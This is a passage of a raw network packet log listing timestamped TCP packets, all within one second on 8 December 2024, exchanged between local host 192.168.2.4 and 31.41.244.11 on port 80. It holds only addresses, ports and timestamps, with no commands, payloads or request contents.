                                                                                                                                          Dec 8, 2024 18:06:12.512604952 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.512629032 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.513333082 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.513386011 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.513441086 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.513598919 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.514285088 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.514337063 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.514414072 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.514511108 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.515177965 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.515222073 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.515351057 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.515402079 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.516007900 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.516055107 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.660603046 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.660917044 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.660979033 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.661019087 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.661029100 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.661056042 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.661130905 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.661734104 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.661782980 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.661814928 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.662657022 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.662703991 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.662776947 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.663551092 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.663599968 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.663682938 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.663727045 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.664422989 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.664535999 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.664581060 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.665378094 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.665507078 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.665549040 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.666296959 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.666383028 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.666425943 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.667192936 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.667324066 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.667363882 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.668082952 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.668128014 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.668224096 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.668993950 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.669035912 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.669095993 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.669965029 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.670010090 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.670097113 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.670135975 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.670836926 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.670948029 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.671008110 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.671720028 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.671799898 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.671840906 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.672616959 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.672666073 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.672696114 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.672894955 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.673515081 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.673624992 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.673667908 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.674510956 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.674602985 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.674648046 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.675410032 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.675453901 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.675488949 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.675914049 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.676260948 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.676301003 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.676321030 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.676362991 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.677170992 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.677215099 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.677297115 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.677342892 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.678113937 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.678157091 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.678188086 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.678224087 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.678992987 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.679059982 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.679107904 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.679904938 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.680006027 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.680052042 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.680840015 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.681039095 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.681082964 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.681790113 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.681833029 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.681863070 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.682615995 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.682657003 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.682724953 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.683521032 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.683558941 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.683634043 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.683675051 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.684448004 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.684578896 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.684619904 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.685365915 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.685457945 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.685502052 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.686266899 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.686316013 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.686383963 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.686860085 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.687165976 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.687216043 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.687294006 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.687334061 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.688059092 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.688172102 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.688215971 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.688996077 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.689112902 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.689152002 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.689903021 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.689948082 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.690031052 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.690804005 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.690853119 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.690922022 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.691754103 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.691792965 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.691860914 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.691904068 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.692656040 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.692785025 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.692832947 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.693523884 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.693634987 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.693680048 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.694586039 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.694627047 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.694662094 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.695466995 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.695507050 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.695554018 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.696264029 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.696305990 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.696378946 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.696415901 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.697228909 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.697382927 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.697427034 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.698285103 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.698429108 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.698474884 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.699270964 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.699321985 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.699393034 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.699903965 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.700402975 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.700444937 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.700475931 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.700519085 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.701102018 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.701143026 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.701178074 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.701221943 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.701880932 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.701941967 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.702055931 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.702753067 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.702811956 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.702855110 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.703006029 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.703139067 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.703665018 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.703716040 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.703761101 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.703824997 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.704612017 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.704662085 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.704693079 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.704982996 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.705611944 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.705662012 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.705701113 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.705740929 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.706530094 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.706579924 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.706602097 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.706696033 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.707442999 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.707525015 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.707567930 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.708245993 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.708894014 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.853005886 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.853017092 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.853079081 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.853127003 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.853137970 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.853403091 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.853938103 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.854077101 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.854125023 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.854897976 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.854943991 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.854974031 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.855866909 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.855902910 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.855971098 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.856014967 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.856653929 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.856715918 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.856758118 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.857578039 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.857719898 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.857764959 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.858711958 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.858756065 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.858844995 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.858921051 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.859395981 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.859436989 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.859528065 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.859560966 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.860318899 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.860426903 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.860470057 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.861363888 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.861495018 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.861542940 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.862312078 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.862353086 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.862422943 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.863394022 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.863434076 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.863503933 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.864346027 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.864383936 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.864537001 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.864571095 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.865247011 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.865300894 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.865340948 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.865987062 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.866090059 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.866130114 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.866695881 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.866734028 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.866825104 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.867542028 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.867585897 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.867633104 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.867904902 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.868448973 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.868607044 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.868662119 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.869364977 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.869488001 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.869529963 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.870302916 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.870341063 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.870369911 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.870914936 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.871181011 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.871287107 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.871335983 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.872081041 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.872245073 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.872292995 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.873022079 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.873059988 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.873066902 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.873097897 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.873920918 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.873985052 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.874083042 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.874888897 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.874929905 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.874938011 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.874965906 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.875725031 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.875771046 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.875868082 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.875907898 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.876633883 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.876674891 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.876818895 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.876859903 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.877574921 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.877688885 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.877736092 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.878437042 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.878649950 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.878701925 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.879381895 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.879494905 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.879539967 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.880256891 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.880388021 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.880430937 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.881167889 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.881203890 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.881268024 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.882107019 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.882153988 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:12.882157087 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:12.882193089 CET4976580192.168.2.431.41.244.11
